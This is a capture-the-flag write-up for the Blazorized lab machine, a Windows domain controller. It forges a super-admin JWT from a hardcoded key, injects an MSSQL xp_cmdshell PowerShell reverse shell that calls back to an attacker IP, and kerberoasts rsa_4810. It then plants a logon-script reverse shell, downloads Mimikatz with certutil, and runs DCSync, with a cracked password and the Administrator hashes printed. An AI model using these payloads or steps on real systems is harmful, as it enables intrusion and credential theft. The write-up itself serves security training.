Week 12. Blazorized

TL;DR

This is a Windows Server 2019 machine hosting a web site made with Blazor, an ASP.NET framework for building WebAssembly-based sites. Enumerating the application we are able to retrieve vulnerable binary files and, after reversing them, find out how to create super admin access JWT tokens. Once inside the admin dashboard we use MSSQL injection to gain our first low-priv shell. Regarding escalation, we discover several permissive ACE's with Bloodhond and abuse them with PowerView to move laterally between domain users. Finally we land in a user account holding DCSync permissions, and we use it to root the domain.

KEYWORDS

Blazor, .NET, reversing, dnSpy, Unix time, JWT forging, MSSQL injection, Active Directory, Bloodhound enumeration, PowerView, WriteSPN, targeted kerberoasting, ACL enumeration, script path abuse, DCSync attack, Invoke-Mimikatz.

REFERENCES

https://support.bloodhoundenterprise.io/hc/en-us/articles/17222775975195-WriteSPN https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#genericwrite-on-user

ENUMERATION

Port scan.

> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-10 14:50 EDT
Nmap scan report for 10.10.11.22
Host is up, received user-set (0.060s latency).
Not shown: 43083 filtered tcp ports (no-response), 22440 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       REASON
53/tcp    open  domain        syn-ack
80/tcp    open  http          syn-ack
135/tcp   open  msrpc         syn-ack
139/tcp   open  netbios-ssn   syn-ack
445/tcp   open  microsoft-ds  syn-ack
464/tcp   open  kpasswd5      syn-ack
3268/tcp  open  globalcatLDAP syn-ack
5985/tcp  open  wsman         syn-ack
49664/tcp open  unknown       syn-ack
49673/tcp open  unknown       syn-ack
49692/tcp open  unknown       syn-ack
49776/tcp open  unknown       syn-ack

Nmap done: 1 IP address (1 host up) scanned in 54.88 seconds

Enumerate the open ports.

> nmap $target -p53,80,135,139,445,464,3268,5985 -sV -sC -Pn -vv 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-10 14:53 EDT
Nmap scan report for 10.10.11.22
Host is up, received user-set (0.038s latency).
Scanned at 2024-10-10 14:53:03 EDT for 19s

PORT     STATE SERVICE       REASON  VERSION
53/tcp   open  domain        syn-ack Simple DNS Plus
80/tcp   open  http          syn-ack Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 49214/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 33356/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 39093/udp): CLEAN (Failed to receive data)
|   Check 4 (port 35591/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-10T18:53:46
|_  start_date: N/A
|_clock-skew: 29s

Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds

Add to hosts file and enumerate the site with Firefox.

Fuzz for subdomains.

> ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fc 404,302 -t 100 -u http://blazorized.htb -H "Host: FUZZ.blazorized.htb"
 
        /'___\  /'___\           /'___\      
       /\ \__/ /\ \__/  __  __  /\ \__/      
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
         \ \_\   \ \_\  \ \____/  \ \_\      
          \/_/    \/_/   \/___/    \/_/      
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://blazorized.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.blazorized.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404,302
________________________________________________
 
admin                   [Status: 200, Size: 2042, Words: 149, Lines: 28, Duration: 74ms]
:: Progress: [4989/4989] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:08] :: Errors: 0 ::

Add the subdomain to hosts file and enumerate with Firefox.

There is also a "Check for updates" section, if we click and inspect the traffic with Burpsuite, we capture a JWT token.

Decode the token to get an idea how they are formed. We discover they are signed using HS512 symmetric algorithm and also disclose super admin username.

USER

Let's continue inspecting the traffic with Burpsuite. There is a request for a blazor.boot.json that contains information about the application.

It can also be downloaded with Firefox, right click on the tab, click on "Inspect code" and add the path to the JSON file.

In the JSON there is a reference to a DLL called blazorized.helpers.dll. Download it (just enter URL http://blazorized.htb/_framework/blazorized.helpers.dll) and decompile with dnspy, here we see several things.

First, JWT tokens are signed with a symmetric key (HS512 algorithm), as we had seen before.

A bit further in the code we see the HS512 key hardcoded in the source code, along with other claims and a new subdomain http://api.blazorized.htb

And we find out how the tokens are generated.

The application is using Unix time to calculate token expiration times.

All in all, we have all we need to forge our own super admin ticket. To calculate Unix time I made a short Python script.

import datetime

date = datetime.datetime.utcnow() + datetime.timedelta(seconds=600)
unix_time = int(date.timestamp())
 
print(unix_time)

And used it to calculate expiration time (600 seconds from current time).

Entered this data in https://jwt.io, along with the wanted role and super admin email, so we calculate our forged token.

To use this token we load it in a Firefox tab using the console (F12). First we declare the token variable.

let token = 'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJleHAiOjE3Mjg2NzAyODcsImlzcyI6Imh0dHA6Ly9hcGkuYmxhem9yaXplZC5odGIiLCJhdWQiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIn0.948SOVXlaqFPcCLwtwYD7ifsRfwyHHAmVUoqGLcPsr6PMCilxzNZZrpL-GjMkBlE3jRqipGWZtgYyra1_dtT-Q';

And assign it to a cookie called jwt

localStorage.setItem('jwt', token);

Reload the site http://admin.blazorized.htb site and you are logged in as super admin.

They say the application talks to the database directly, so we can try an MSSQL injection. The point of entry is the "Check duplicate category names".

For the payload, I used a powershell -e base64-encoded payload.

'; exec master.dbo.xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADEAIgAsADEAOQAxADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA' -- -

This provides a reverse shell for user nu_1055

That can be used to retrieve the user flag.

SYSTEM

Start from the low-priv shell and take the opportunity to enumerate the user and the system.

> systeminfo
Host Name:                 DC1
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
 
> net user
User accounts for \\DC1
-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt                  
LSA_3211                 LSA_3212                 LSA_3213                
NU_1055                  NU_1056                  NU_1057                 
NU_1058                  RSA_4810                 RSA_4811                
RSA_4812                 RSA_4813                 RSA_4814                
SSA_6010                 SSA_6011                 SSA_6012                
SSA_6013                
The command completed successfully.
 
> net user nu_1055
User name                    NU_1055
Full Name                    NU_1055
Comment                     
User's comment              
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            2/25/2024 12:55:07 PM
Password expires             Never
Password changeable          2/26/2024 12:55:07 PM
Password required            Yes
User may change password     No
 
Workstations allowed         All
Logon script                
User profile                 C:\Users\NU_1055
Home directory               C:\Users\NU_1055
Last logon                   10/11/2024 9:37:11 AM
 
Logon hours allowed          All
 
Local Group Memberships      *IIS_IUSRS            *Remote Management Use
Global Group memberships     *Normal_Users         *Domain Users        
The command completed successfully.
 
> whoami /priv
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                    State  
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Transfer a sharphound.exe ingestor to the host and enumerate the domain with Bloodhound. Use the previously list of usernames we have just enumerated and the Bloodhound path finding tool.

There is an interesting edge from nu_1055 to rsa_4810. There is info about WriteSPN edges here:https://support.bloodhoundenterprise.io/hc/en-us/articles/17222775975195-WriteSPN

Basically, we have permission to add an SPN to rsa_4810 account, thus making it vulnerable to targeted kerberoasting (https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting).

Let's modify account's SPN with powerview.ps1

> . .\powerview.ps1

> Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='hey/hey'}

Now request a Kerberos ticket for the SPN we have just created.

> Get-DomainSPNTicket -SPN hey/hey

This ticket can be cracked (module 13100), and the password is valid to Evil-WinRM into the host as user rsa_4810

> evil-winrm -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)' -i blazorized.htb

Now we can mark rsa_4810 as "Owned" in Bloodhound and continue enumerating. It seems both rsa_4810 and nu_1055 are members of the Remote Management Users group, along with another one called ssa_6010

If we continue enumerating this user we see he is one of the principals with DCSync rights, meaning he is candidate to our next lateral movement.

Enumerate the user's ACL from rsa_4810 shell using PowerView's Get-ObjectAcl cmdlet.

> Get-ObjectAcl -SamAccountName ssa_6010 -ResolveGUIDS | ?{$_.ActiveDirectoryRights -eq "WriteProperty"}
             
AceQualifier           : AccessAllowed
ObjectDN               : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights  : WriteProperty
ObjectAceType          : Script-Path
ObjectSID              : S-1-5-21-2039403211-964143010-2924010611-1124
InheritanceFlags       : None
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-2039403211-964143010-2924010611-1107
AccessMask             : 32
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0
 
AceQualifier           : AccessAllowed
ObjectDN               : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights  : WriteProperty
ObjectAceType          : ms-TPM-Tpm-Information-For-Computer
ObjectSID              : S-1-5-21-2039403211-964143010-2924010611-1124
InheritanceFlags       : ContainerInherit
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback             : False
PropagationFlags       : InheritOnly
SecurityIdentifier     : S-1-5-10
AccessMask             : 32
AuditFlags             : None
IsInherited            : True
AceFlags               : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength           : 0

We see current user has write permissions over ssa_6010 script path, meaning we can add scripts that will be automatically executed when the user logs in.

> Convert-SidToName S-1-5-21-2039403211-964143010-2924010611-1107
BLAZORIZED\RSA_4810

Info about how to exploit this is provided here:https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#genericwrite-on-user

First add a reverse shell in the file shell.bat and save in the SYSVOL folder.

> 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADEAIgAsADEAOQAxADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'| Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\shell.bat -Encoding ASCII

Now modify the script path for user ssa_6010

> Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\shell.bat'

Shortly after the user logs in again, the script is executed and a shell is received on port 1919.

From here we can launch a DCSync attack.

We do not know clear text password or hash of user ssa_6010 so cannot do it remotely with Impacket. So we will use a Mimikatz copy stored locally. Download a copy of invoke-mimikatz.ps1 with certutil and dot source the script.

> certutil -urlcache -split -f http://10.10.14.101/invoke-mimikatz.ps1

> . .\invoke-mimikatz.ps1

Issue the DCSync attack, the administrator hash is dumped.

> invoke-mimikatz -command '"token::elevate" "lsadump::dcsync /domain:blazorized.htb /user:Administrator"'
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Jul 24 2021 11:00:11
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(powershell) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM
 
 
mimikatz(powershell) # lsadump::dcsync /domain:blazorized.htb /user:Administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
 
Object RDN           : Administrator
 
** SAM ACCOUNT **
 
SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID   : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID   : 500
 
Credentials:
  Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
    ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
    ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
    ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
    ntlm- 5: b471c416c10615448c82a2cbb731efcb
    ntlm- 6: b471c416c10615448c82a2cbb731efcb
    ntlm- 7: aec132eaeee536a173e40572e8aad961
    ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
    ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
    lm  - 0: ad37753b9f78b6b98ec3bb65e5995c73
    lm  - 1: c449777ea9b0cd7e6b96dd8c780c98f0
    lm  - 2: ebbe34c80ab8762fa51e04bc1cd0e426
    lm  - 3: 471ac07583666ccff8700529021e4c9f
    lm  - 4: ab4d5d93532cf6ad37a3f0247db1162f
    lm  - 5: ece3bdafb6211176312c1db3d723ede8
    lm  - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
    lm  - 7: 8b3c1950099a9d59693858c00f43edaf
    lm  - 8: a14ac624559928405ef99077ecb497ba
 
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 36ff197ab8f852956e4dcbbe85e38e17
 
* Primary:Kerberos-Newer-Keys *
    Default Salt : BLAZORIZED.HTBAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
      aes128_hmac       (4096) : df4dbea7fcf2ef56722a6741439a9f81
      des_cbc_md5       (4096) : 310e2a0438583dce
    OldCredentials
      aes256_hmac       (4096) : eeb59c1fa73f43372f40f4b0c9261f30ce68e6cf0009560f7744d8871058af2c
      aes128_hmac       (4096) : db4d9e0e5cd7022242f3e03642c135a6
      des_cbc_md5       (4096) : 1c67ef730261a198
    OlderCredentials
      aes256_hmac       (4096) : bb7fcd1148a3863c9122784becf13ff7b412af7d734162ed3cb050375b1a332c
      aes128_hmac       (4096) : 2d9925ef94916523b24e43d1cb8396ee
      des_cbc_md5       (4096) : 9b01158c8923ce68
 
* Primary:Kerberos *
    Default Salt : BLAZORIZED.HTBAdministrator
    Credentials
      des_cbc_md5       : 310e2a0438583dce
    OldCredentials
      des_cbc_md5       : 1c67ef730261a198
 
* Packages *
    NTLM-Strong-NTOWF
 
* Primary:WDigest *
    01  7e35fe37aac9f26cecc30390171b6dcf
    02  a8710c4caaab28c0f2260e7c7bd3b262
    03  81eae4cf7d9dadff2073fbf2d5c60539
    04  7e35fe37aac9f26cecc30390171b6dcf
    05  9bc0a87fd20d42df13180a506db93bb8
    06  26d42d164b0b82e89cf335e8e489bbaa
    07  d67d01da1b2beed8718bb6785a7a4d16
    08  7f54f57e971bcb257fc44a3cd88bc0e3
    09  b3d2ebd83e450c6b0709d11d2d8f6aa8
    10  1957f9211e71d307b388d850bdb4223f
    11  2fa495bdf9572e0d1ebb98bb6e268b01
    12  7f54f57e971bcb257fc44a3cd88bc0e3
    13  de0bba1f8bb5b81e634fbaa101dd8094
    14  2d34f278e9d98e355b54bbd83c585cb5
    15  06b7844e04f68620506ca4d88e51705d
    16  97f5ceadabcfdfcc019dc6159f38f59e
    17  ed981c950601faada0a7ce1d659eba95
    18  cc3d2783c1321d9d2d9b9b7170784283
    19  0926e682c1f46c007ba7072444a400d7
    20  1c3cec6d41ec4ced43bbb8177ad6e272
    21  30dcd2ebb2eda8ae4bb2344a732b88f9
    22  b86556a7e9baffb7faad9a153d1943c2
    23  c6e4401e50b8b15841988e4314fbcda2
    24  d64d0323ce75a4f3dcf0b77197009396
    25  4274d190e7bc915d4047d1a63776bc6c
    26  a04215f3ea1d2839a3cdca4ae01e2703
    27  fff4b2817f8298f09fd45c3be4568ab1
    28  2ea3a6b979470233687bd913a8234fc7
    29  73d831d131d5e67459a3949ec0733723

The only thing that's left is to open an administrator shell with Impacket.

You are root.